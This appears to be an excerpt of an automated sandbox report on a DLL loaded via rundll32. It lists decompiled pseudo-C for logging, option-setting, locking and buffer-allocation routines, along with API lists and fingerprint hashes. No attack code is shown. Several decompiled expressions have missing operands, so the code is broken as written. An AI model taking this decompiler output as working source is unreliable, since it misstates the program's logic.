                                                      								}
                                                      							}
                                                      						}
                                                      						goto L66;
                                                      						L15:
                                                      						_t168[1] = _t121;
                                                      						_t168[7] = _t121;
                                                      						_t168[3] = _t168[0x112];
                                                      						_t168[2] = _t168[0x111];
                                                      						_t91 =  *_t167;
                                                      						 *_t168 = _t91 + _t145;
                                                      						L1009DCA8();
                                                      						if(_t91 != 0) {
                                                      							_t122 = _t167[1];
                                                      							_t92 =  <=  ? 0xfffffffa - _t122 : _t91;
                                                      							_t136 = _t167[2];
                                                      							_t86 = ( <=  ? 0xfffffffa - _t122 : _t91) + _t122;
                                                      							_t167[1] = _t86;
                                                      							if(_t136 != 0) {
                                                      								goto L39;
                                                      							}
                                                      							goto L40;
                                                      						} else {
                                                      							_t123 = _t168[7];
                                                      							_t159 = 0x7fffffff;
                                                      							_t145 = _t167[1];
                                                      							_t118 = _t167[2];
                                                      							if(_t123 <= 0x3fffffff) {
                                                      								_t159 = _t123 + _t123;
                                                      							}
                                                      							goto L11;
                                                      						}
                                                      						goto L66;
                                                      					}
                                                      				}
                                                      				L66:
                                                      			}









































                                                      0x1000939a
                                                      0x1000939c
                                                      0x1000939f
                                                      0x100093a2
                                                      0x100093a5
                                                      0x100093a5
                                                      0x10009394
                                                      0x1000927a
                                                      0x1000927a
                                                      0x1000927a
                                                      0x10009197
                                                      0x1000919a
                                                      0x00000000
                                                      0x1000919a
                                                      0x10009189
                                                      0x10009179
                                                      0x00000000
                                                      0x100091f8
                                                      0x100091f8
                                                      0x10009203
                                                      0x10009207
                                                      0x10009212
                                                      0x10009216
                                                      0x1000921b
                                                      0x1000921e
                                                      0x10009225
                                                      0x10009438
                                                      0x10009444
                                                      0x10009447
                                                      0x1000944a
                                                      0x1000944c
                                                      0x10009451
                                                      0x00000000
                                                      0x10009457
                                                      0x00000000
                                                      0x1000922b
                                                      0x1000922b
                                                      0x1000922f
                                                      0x10009234
                                                      0x10009237
                                                      0x10009240
                                                      0x10009246
                                                      0x10009246
                                                      0x00000000
                                                      0x10009240
                                                      0x00000000
                                                      0x10009225
                                                      0x1000919d
                                                      0x00000000

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_reallocstrftimestrlen
                                                      • String ID: !!!!$[truncated strftime output]
                                                      • API String ID: 709960874-1743851734
                                                      • Opcode ID: f29f42bb8ffea11f48ea5e99c1610936806f5c95083409d1b8b746ef61fd5416
                                                      • Instruction ID: 5e96dacd8902ef441cde7e6f7e331d45904ef3b1d824b749351cd4a48aad1636
                                                      • Opcode Fuzzy Hash: f29f42bb8ffea11f48ea5e99c1610936806f5c95083409d1b8b746ef61fd5416
                                                      • Instruction Fuzzy Hash: FFA1BFB1A042429FE710CF28C98579E77E2EF843D0F268529ED898B399E735DD45CB41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Similarity
                                                      • API ID: mv_expr_parse_and_evalmv_logstrcmp
                                                      • String ID: 9$all$default$max$min$none
                                                      • API String ID: 638344568-340763830
                                                      • Opcode ID: cbd95094e55aa019dd321054222498a877d501c9dab8c4b56b7ccccdadb64703
                                                      • Instruction ID: 411126b03e5c4c9fee0fee3cc8844fcbddd9a5d1040519b46a4fb5c1d41167ed
                                                      • Opcode Fuzzy Hash: cbd95094e55aa019dd321054222498a877d501c9dab8c4b56b7ccccdadb64703
                                                      • Instruction Fuzzy Hash: EC514A7590974A8BC351EF68E04469BF7E5FF89344F518A2EE9C9D7200EB70E9048B82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Similarity
                                                      • API ID: mv_bprint_init_for_buffermv_bprintf
                                                      • String ID: AMBI%d$NONE$USR%d
                                                      • API String ID: 2490314137-3656852315
                                                      • Opcode ID: 18c3f00c932525b9a03c6c26bd996f108cdefc78bc7c7bb15c7cae72aa0d9e7e
                                                      • Instruction ID: 1ef98ca077266c32d1aee9727dfec110bedddac347624ae906d8e5fb6b24c5a3
                                                      • Opcode Fuzzy Hash: 18c3f00c932525b9a03c6c26bd996f108cdefc78bc7c7bb15c7cae72aa0d9e7e
                                                      • Instruction Fuzzy Hash: 20114FB4918B55CBE714EF28C480A5EB7E0FF88780F51C92EF68897254D334AE419B97
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Similarity
                                                      • API ID: mv_bprint_init_for_buffermv_bprintf
                                                      • String ID: ambisonic ACN %d$none$user %d
                                                      • API String ID: 2490314137-4180635230
                                                      • Opcode ID: 6d247fa50da3d5541497e9d82b9e4f8f3eef7e7a432eeee65763f77ec15faa69
                                                      • Instruction ID: c94b059796d13185444bee4ca381abcd6d61be9244a4282c7920a982e5d4d1e4
                                                      • Opcode Fuzzy Hash: 6d247fa50da3d5541497e9d82b9e4f8f3eef7e7a432eeee65763f77ec15faa69
                                                      • Instruction Fuzzy Hash: 51112EB4908B55CBE320DF24D480A6EB7E0FF847C4F51882EF59887289D734A941DB97
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 40%
                                                      			E10023249(void* __eax, signed char* __ebp, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, unsigned int _a36, intOrPtr _a40, intOrPtr _a44, char _a48, signed char* _a1072, signed char* _a2096, signed char* _a3120, signed char* _a4144, intOrPtr _a4148, intOrPtr _a4152, signed int _a5204, char* _a5208, char* _a5212) {
                                                      				signed int _t67;
                                                      				signed int _t71;
                                                      				signed int _t74;
                                                      				signed int _t77;
                                                      				signed int _t80;
                                                      				signed int _t85;
                                                      				void* _t88;
                                                      				signed char* _t89;
                                                      				int _t91;
                                                      				signed char* _t92;
                                                      				char* _t97;
                                                      				intOrPtr _t100;
                                                      				signed char* _t101;
                                                      				char* _t111;
                                                      				signed char* _t112;
                                                      				signed char* _t113;
                                                      				signed char* _t114;
                                                      				signed char* _t115;
                                                      				char* _t117;
                                                      				signed int _t131;
                                                      				signed char* _t132;
                                                      				char* _t133;
                                                      				signed int _t134;
                                                      				char* _t136;
                                                      				signed char* _t141;
                                                      				signed char** _t143;
                                                      
                                                      				_t141 = __ebp;
                                                      				_a44 = 0x10;
                                                      				_a40 = 0x10;
                                                      				if(_a5204 < 0xfffffff9 || __eax == 0 || ( *0x100d568c & 0x00000002) == 0) {
                                                      					L3:
                                                      					 *_t143 = _t141;
                                                      					_a8 = _a5212;
                                                      					_a4 = _a5208;
                                                      					L10008B70();
                                                      					_t117 = _a1072;
                                                      					_t111 = _a2096;
                                                      					_t133 = _a3120;
                                                      					_t136 = _a4144;
                                                      					if( *_t117 != 0 ||  *_t111 != 0 ||  *_t133 != 0 ||  *_t136 != 0) {
                                                      						_t100 = _a4148;
                                                      						_t67 = 0;
                                                      						if(_t100 != 0 && _a4152 >= _t100) {
                                                      							_t67 = (0 | ( *(_t136 + _t100 - 1) & 0x000000ff) == 0x0000000a |  *(_t136 + _t100 - 1) & 0 | ( *(_t136 + _t100 - 1) & 0x000000ff) == 0x0000000d) & 0x000000ff;
                                                      						}
                                                      						 *0x100aa00c = _t67;
                                                      					}
                                                      					_a24 = _t136;
                                                      					_t101 =  &_a48;
                                                      					_a8 = "%s%s%s%s";
                                                      					_a20 = _t133;
                                                      					_a16 = _t111;
                                                      					_a12 = _t117;
                                                      					_a4 = 0x400;
                                                      					 *_t143 = _t101;
                                                      					L10022FC0();
                                                      					_t71 =  *0x100d5680;
                                                      					if(_t71 == 0) {
                                                      						 *_t143 = 2;
                                                      						L1009DD30();
                                                      						asm("sbb eax, eax");
                                                      						 *0x100d5680 = _t71 | 0x00000001;
                                                      					}
                                                      					_t134 =  *0x100aa00c; // 0x1
                                                      					_t137 =  *0x100d5260;
                                                      					if(_t134 == 0 || ( *0x100d568c & 0x00000001) == 0) {
                                                      						L14:
                                                      						if(_t137 > 0) {
                                                      							 *_t143 = 2;
                                                      							_t134 = 0;
                                                      							_t89 =  *0x100aa0cc();
                                                      							_a8 = _t137;
                                                      							_t137 = "    Last message repeated %d times\n";
                                                      							_a4 = "    Last message repeated %d times\n";
                                                      							 *_t143 = _t89;
                                                      							L10022AF0();
                                                      							 *0x100d5260 = 0;
                                                      						}
                                                      						_a4 = _t101;
                                                      						 *_t143 = 0x100d5280;
                                                      						strcpy(??, ??);
                                                      						_t112 = _a1072;
                                                      						_t74 =  *_t112 & 0x000000ff;
                                                      						if(_t74 == 0) {
                                                      							L22:
                                                      							L10022C90(_a40, _t101, _t112, 0, _t134, _t137);
                                                      							_t113 = _a2096;
                                                      							_t77 =  *_t113 & 0x000000ff;
                                                      							if(_t77 == 0) {
                                                      								L28:
                                                      								L10022C90(_a44, _t101, _t113, 0, _t134, _t137);
                                                      								_t114 = _a3120;
                                                      								_t80 =  *_t114 & 0x000000ff;
                                                      								if(_t80 == 0) {
                                                      									L34:
                                                      									_t139 = _a36 >> 8;
                                                      									_t104 =  >  ? 7 : _a5204 >> 3;
                                                      									_t105 =  <  ? 0 :  >  ? 7 : _a5204 >> 3;
                                                      									L10022C90( <  ? 0 :  >  ? 7 : _a5204 >> 3,  <  ? 0 :  >  ? 7 : _a5204 >> 3, _t114, _a36 >> 8, _t134, _a36 >> 8);
                                                      									_t115 = _a4144;
                                                      									_t85 =  *_t115 & 0x000000ff;
                                                      									if(_t85 == 0) {
                                                      										L40:
                                                      										L10022C90(_t105, _t105, _t115, _t139, _t134, _t139);
                                                      										goto L41;
                                                      									}
                                                      									L36:
                                                      									while(_t85 - 0xe > 0x11 && _t85 > 7) {
                                                      										_t85 = _t115[1] & 0x000000ff;
                                                      										_t115 =  &(_t115[1]);
                                                      										if(_t85 != 0) {
                                                      											continue;
                                                      										}
                                                      										L39:
                                                      										_t115 = _a4144;
                                                      										goto L40;
                                                      									}
                                                      									 *_t115 = 0x3f;
                                                      									_t115 =  &(_t115[1]);
                                                      									_t85 =  *_t115 & 0x000000ff;
                                                      									if(_t85 != 0) {
                                                      										goto L36;
                                                      									}
                                                      									goto L39;
                                                      								}
                                                      								L30:
                                                      								while(_t80 - 0xe > 0x11 && _t80 > 7) {
                                                      									_t80 = _t114[1] & 0x000000ff;
                                                      									_t114 =  &(_t114[1]);
                                                      									if(_t80 != 0) {
                                                      										continue;
                                                      									}
                                                      									L33:
                                                      									_t114 = _a3120;
                                                      									goto L34;
                                                      								}
                                                      								 *_t114 = 0x3f;
                                                      								_t114 =  &(_t114[1]);
                                                      								_t80 =  *_t114 & 0x000000ff;
                                                      								if(_t80 != 0) {
                                                      									goto L30;
                                                      								}
                                                      								goto L33;
                                                      							}
                                                      							L24:
                                                      							while(_t77 - 0xe > 0x11 && _t77 > 7) {
                                                      								_t77 = _t113[1] & 0x000000ff;
                                                      								_t113 =  &(_t113[1]);
                                                      								if(_t77 != 0) {
                                                      									continue;
                                                      								}
                                                      								L27:
                                                      								_t113 = _a2096;
                                                      								goto L28;
                                                      							}
                                                      							 *_t113 = 0x3f;
                                                      							_t113 =  &(_t113[1]);
                                                      							_t77 =  *_t113 & 0x000000ff;
                                                      							if(_t77 != 0) {
                                                      								goto L24;
                                                      							}
                                                      							goto L27;
                                                      						} else {
                                                      							L18:
                                                      							while(_t74 - 0xe > 0x11 && _t74 > 7) {
                                                      								_t74 = _t112[1] & 0x000000ff;
                                                      								_t112 =  &(_t112[1]);
                                                      								if(_t74 != 0) {
                                                      									continue;
                                                      								}
                                                      								L21:
                                                      								_t112 = _a1072;
                                                      								goto L22;
                                                      							}
                                                      							 *_t112 = 0x3f;
                                                      							_t112 =  &(_t112[1]);
                                                      							_t74 =  *_t112 & 0x000000ff;
                                                      							if(_t74 != 0) {
                                                      								goto L18;
                                                      							}
                                                      							goto L21;
                                                      						}
                                                      					} else {
                                                      						 *_t143 = _t101;
                                                      						_t115 = 0x100d5280;
                                                      						_a4 = 0x100d5280;
                                                      						_t91 = strcmp(??, ??);
                                                      						if(_t91 != 0) {
                                                      							goto L14;
                                                      						}
                                                      						if(_a48 != 0) {
                                                      							 *_t143 = _t101;
                                                      							L1009DCB0();
                                                      							if( *((char*)(_t143 + _t91 + 0x2f)) == 0xd) {
                                                      								goto L14;
                                                      							}
                                                      							_t139 =  &(_t137[1]);
                                                      							 *0x100d5260 = _t139;
                                                      							if( *0x100d5680 == 1) {
                                                      								 *_t143 = 2;
                                                      								_t92 =  *0x100aa0cc();
                                                      								_a8 = _t139;
                                                      								_a4 = "    Last message repeated %d times\r";
                                                      								 *_t143 = _t92;
                                                      								L10022AF0();
                                                      							}
                                                      							L41:
                                                      							 *_t143 = _t141;
                                                      							_a4 = 0;
                                                      							_t88 = E10009690(0, _t115, _t134, _t139);
                                                      							 *_t143 = 0x100d5690;
                                                      							L1009DE50();
                                                      							return _t88;
                                                      						}
                                                      						goto L14;
                                                      					}
                                                      				} else {
                                                      					_t54 = _a5204 + 8; // 0x101
                                                      					_t131 = _t54;
                                                      					_t97 = 0x100b367b;
                                                      					if(_t131 <= 0x40) {
                                                      						_t97 =  *(0x100b3880 + _t131 * 4);
                                                      					}
                                                      					_a8 = _t97;
                                                      					_a4 = "[%s] ";
                                                      					 *_t143 = _t132;
                                                      					L100089C0();
                                                      					goto L3;
                                                      				}
                                                      			}






























                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: ExclusiveLockReleasemv_bprint_finalizemv_bprintfmv_vbprintfstrcmpstrcpy
                                                      • String ID: Last message repeated %d times$%s%s%s%s
                                                      • API String ID: 4275616186-2673086376
                                                      • Opcode ID: 42d1c28a59b315c23aa48637e9ae167f894d38651270de1a8a98ee9fcc4ad737
                                                      • Instruction ID: b81f238ef4300ec1d8f16b3a8da4b914aea516d51c501e69078f494d4313df77
                                                      • Opcode Fuzzy Hash: 42d1c28a59b315c23aa48637e9ae167f894d38651270de1a8a98ee9fcc4ad737
                                                      • Instruction Fuzzy Hash: E561E4709087958FD720DF24D4803AABBE2FF85384F95885EE8C957342C776E985CB82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      • Value %d for parameter '%s' out of %s format range [%d - %d], xrefs: 100281B3
                                                      • Unable to parse option value "%s" as %s, xrefs: 10028165
                                                      • none, xrefs: 1002808E
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_logstrcmpstrtol
                                                      • String ID: Unable to parse option value "%s" as %s$Value %d for parameter '%s' out of %s format range [%d - %d]$none
                                                      • API String ID: 3237617949-2908652078
                                                      • Opcode ID: 691e268f59eefe45aab27bd49c65c0bfe69c5a44b4361b2dd8b56a23eaf8e8d9
                                                      • Instruction ID: 4bc733314f34f2699ba82556ed72ea64bb9030a0ec2445b5dd4e85adb85467a1
                                                      • Opcode Fuzzy Hash: 691e268f59eefe45aab27bd49c65c0bfe69c5a44b4361b2dd8b56a23eaf8e8d9
                                                      • Instruction Fuzzy Hash: AB3137B4A097458FC344DF78948010AFBE1EFC9390F908A2EF9A9D7391E770D9458B42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 16%
                                                      			E1002D660(char* _a4, intOrPtr* _a8, intOrPtr _a12) {
                                                      				char _v32;
                                                      				intOrPtr _v48;
                                                      				char* _v52;
                                                      				intOrPtr _v76;
                                                      				intOrPtr _v80;
                                                      				char* _v84;
                                                      				intOrPtr _v88;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				intOrPtr* _t33;
                                                      				intOrPtr _t37;
                                                      				char* _t41;
                                                      				intOrPtr* _t45;
                                                      				intOrPtr _t52;
                                                      				char* _t53;
                                                      				intOrPtr* _t54;
                                                      				void* _t55;
                                                      				intOrPtr* _t56;
                                                      				void* _t64;
                                                      
                                                      				_t56 = _t55 - 0x4c;
                                                      				_t45 = _a8;
                                                      				_v32 = 0;
                                                      				_t53 = _a4;
                                                      				_t52 = _a12;
                                                      				if(_t45 == 0) {
                                                      					L10:
                                                      					return 0;
                                                      				} else {
                                                      					_t54 = 0;
                                                      					while(1) {
                                                      						_v84 = _t54;
                                                      						_v80 = 2;
                                                      						_v88 = 0x100b3f1d;
                                                      						 *_t56 =  *_t45;
                                                      						_t33 = E100110D0();
                                                      						_t54 = _t33;
                                                      						if(_t33 == 0) {
                                                      							break;
                                                      						}
                                                      						_v80 = _t52;
                                                      						_v84 = _a4;
                                                      						 *_t56 = _t53;
                                                      						_v88 =  *_t54;
                                                      						_t37 = L1002CB80(_t45, _t52, _t53, _t54, _t64);
                                                      						if(_t37 == 0xabafb008) {
                                                      							_v80 = 0;
                                                      							_v84 = _a4;
                                                      							_v88 =  *_t54;
                                                      							_t41 =  &_v32;
                                                      							 *_t56 = _t41;
                                                      							_v52 = _t41;
                                                      							_t37 = E10011210(_t45, _t52, _t53, _t54);
                                                      							if(_t37 >= 0) {
                                                      								continue;
                                                      							} else {
                                                      								goto L6;
                                                      							}
                                                      						} else {
                                                      							if(_t37 >= 0) {
                                                      								continue;
                                                      							} else {
                                                      								_v52 =  &_v32;
                                                      								L6:
                                                      								_v48 = _t37;
                                                      								_v76 = _a4;
                                                      								_v84 = "Error setting option %s to value %s.\n";
                                                      								_v88 = 0x10;
                                                      								 *_t56 = _t53;
                                                      								_v80 =  *_t54;
                                                      								L10023A40();
                                                      								 *_t56 = _v52;
                                                      								L10011CC0();
                                                      								return _v48;
                                                      							}
                                                      						}
                                                      						goto L11;
                                                      					}
                                                      					 *_t56 = _t45;
                                                      					L10011CC0();
                                                      					 *_t45 = _v32;
                                                      					goto L10;
                                                      				}
                                                      				L11:
                                                      			}

























                                                      APIs
                                                      Strings
                                                      • Error setting option %s to value %s., xrefs: 1002D6F7
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_dict_free$mv_dict_getmv_dict_setmv_logmv_opt_set
                                                      • String ID: Error setting option %s to value %s.
                                                      • API String ID: 3258142065-3279051434
                                                      • Opcode ID: ef5084decda187cd213080217201cfa49cd5edc4dfbb471ff57d75f3a90a4203
                                                      • Instruction ID: 35dba755cf83891b6b787024823c04eb56a84bd00f467e741874e99c9612048c
                                                      • Opcode Fuzzy Hash: ef5084decda187cd213080217201cfa49cd5edc4dfbb471ff57d75f3a90a4203
                                                      • Instruction Fuzzy Hash: F731A3B9A087449FC740DF69D58065ABBE4FF88294F51882EF99CC7310E674E940DF82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • AcquireSRWLockExclusive.KERNEL32 ref: 1004A08E
                                                      • SleepConditionVariableSRW.KERNEL32 ref: 1004A0C6
                                                      • ReleaseSRWLockExclusive.KERNEL32 ref: 1004A0DC
                                                      • AcquireSRWLockExclusive.KERNEL32 ref: 1004A123
                                                      • WakeConditionVariable.KERNEL32 ref: 1004A135
                                                      • ReleaseSRWLockExclusive.KERNEL32 ref: 1004A141
                                                      • mv_log.MAIN ref: 1004A1E7
                                                      • abort.MSVCRT ref: 1004A1EC
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: ExclusiveLock$AcquireConditionReleaseVariable$SleepWakeabortmv_log
                                                      • String ID:
                                                      • API String ID: 347658250-0
                                                      • Opcode ID: 5fa1784df7e6f5e9cb7a8772d34de868a2265032091343187e4fb7fffa3ef144
                                                      • Instruction ID: fe769e6f261b0c0b4b117e343d60818024885dfb85fec5dec2932d96265b7c30
                                                      • Opcode Fuzzy Hash: 5fa1784df7e6f5e9cb7a8772d34de868a2265032091343187e4fb7fffa3ef144
                                                      • Instruction Fuzzy Hash: 7B5136B5604B058FD720EF29C58020BFBE1FF89354F118A2DE99A97610E774F949CB82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 32%
                                                      			E10002670(void* __ecx, void* __edx) {
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				signed int _t39;
                                                      				void* _t44;
                                                      				signed int _t50;
                                                      				signed int _t52;
                                                      				signed int _t53;
                                                      				intOrPtr* _t54;
                                                      				signed int _t55;
                                                      				signed int _t65;
                                                      				void* _t66;
                                                      				signed int _t68;
                                                      				signed int _t69;
                                                      				signed int _t70;
                                                      				void* _t71;
                                                      				signed int* _t72;
                                                      
                                                      				_t72 = _t71 - 0x3c;
                                                      				_t72[4] = 1;
                                                      				_t69 = _t72[0x14];
                                                      				_t52 = _t72[0x15];
                                                      				_t72[2] = _t72[0x16];
                                                      				_t72[3] = _t69;
                                                      				_t72[1] = _t52;
                                                      				 *_t72 =  &(_t72[0xb]);
                                                      				if(E1003A070(_t52, __edx, 1, _t66) < 0) {
                                                      					L14:
                                                      					return 0;
                                                      				} else {
                                                      					 *_t72 = 0x1c;
                                                      					_t39 = E100265E0();
                                                      					_t65 = _t39;
                                                      					if(_t39 == 0) {
                                                      						goto L14;
                                                      					} else {
                                                      						 *(_t39 + 0x10) = _t52;
                                                      						 *(_t39 + 0x14) = _t69;
                                                      						asm("cdq");
                                                      						 *(_t65 + 0x18) = _t72[0xb] / _t72[0x16];
                                                      						 *_t72 = _t69;
                                                      						E1003A050();
                                                      						_t53 =  ==  ? 1 : _t52;
                                                      						 *(_t65 + 4) = _t53;
                                                      						_t72[1] = 4;
                                                      						 *_t72 = _t53;
                                                      						_t44 = E100266D0();
                                                      						 *_t65 = _t44;
                                                      						if(_t44 == 0) {
                                                      							L13:
                                                      							 *_t72 = _t65;
                                                      							L100265B0();
                                                      							goto L14;
                                                      						} else {
                                                      							_t70 = 0;
                                                      							if( *(_t65 + 4) > 0) {
                                                      								while(1) {
                                                      									_t68 = _t70 * 4;
                                                      									_t72[2] = 0;
                                                      									_t54 = _t44 + _t68;
                                                      									_t72[1] = 1;
                                                      									 *_t72 = _t72[0xb];
                                                      									 *_t54 = L10017E40(_t54, _t65, _t68);
                                                      									_t44 =  *_t65;
                                                      									if( *((intOrPtr*)(_t44 + _t68)) == 0) {
                                                      										break;
                                                      									}
                                                      									_t70 = _t70 + 1;
                                                      									if( *(_t65 + 4) <= _t70) {
                                                      										goto L15;
                                                      									} else {
                                                      										continue;
                                                      									}
                                                      									goto L16;
                                                      								}
                                                      								if(_t44 != 0) {
                                                      									if( *(_t65 + 4) > 0) {
                                                      										_t55 = 0;
                                                      										while(1) {
                                                      											_t50 = _t44 + _t55 * 4;
                                                      											_t55 = _t55 + 1;
                                                      											 *_t72 = _t50;
                                                      											L10018950(_t55);
                                                      											if(_t55 >=  *(_t65 + 4)) {
                                                      												goto L12;
                                                      											}
                                                      											_t44 =  *_t65;
                                                      										}
                                                      									}
                                                      									L12:
                                                      									 *_t72 = _t65;
                                                      									E100265C0();
                                                      								}
                                                      								goto L13;
                                                      							} else {
                                                      								L15:
                                                      								 *(_t65 + 0xc) = _t72[0x16];
                                                      								return _t65;
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      				L16:
                                                      			}






















                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_callocmv_fifo_alloc2mv_fifo_freep2mv_freepmv_malloczmv_sample_fmt_is_planarmv_samples_get_buffer_size
                                                      • String ID:
                                                      • API String ID: 3721653357-0
                                                      • Opcode ID: 42dff5a3eb04adc49f19050df871efb01a7c87c8a448b2921b037ed844c736a9
                                                      • Instruction ID: bb9eb3e5d0204011adfe0aa4748bc2d8f300a22c96b3cf74cba0d42d24462043
                                                      • Opcode Fuzzy Hash: 42dff5a3eb04adc49f19050df871efb01a7c87c8a448b2921b037ed844c736a9
